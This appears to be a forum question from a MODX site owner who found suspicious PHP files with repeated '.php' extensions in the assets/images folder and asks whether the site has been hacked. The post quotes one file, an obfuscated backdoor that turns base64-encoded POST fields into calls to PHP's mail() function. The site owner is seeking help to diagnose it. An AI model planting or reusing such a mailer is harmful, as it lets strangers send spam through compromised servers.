There are strange php files in my modx assets -> images
cklxt.php.php.php.php
cklxt.php.php.php.php.php
If I open them, the code does not seem related to images:
<?php
$ixhpq = stripslashes(base64_decode($_POST['gqujwdb']));
$xuoh = stripslashes(base64_decode($_POST['maih']));
$iglrhrluhvqgr = stripslashes(base64_decode($_POST['mepouebon']));
$yflalhugo = stripslashes(base64_decode($_POST['cdcftxzkyrg']));
$nzcbxor = mail(stripslashes($ixhpq), stripslashes($xuoh), stripslashes($iglrhrluhvqgr), stripslashes($yflalhugo));
if($nzcbxor){echo 'nlewxnrsdqxow';} else {echo 'qhguq : ' . $nzcbxor;}
There are many more...
Are these php files supposed to in there? Or are they bugs or the site have been hacked?
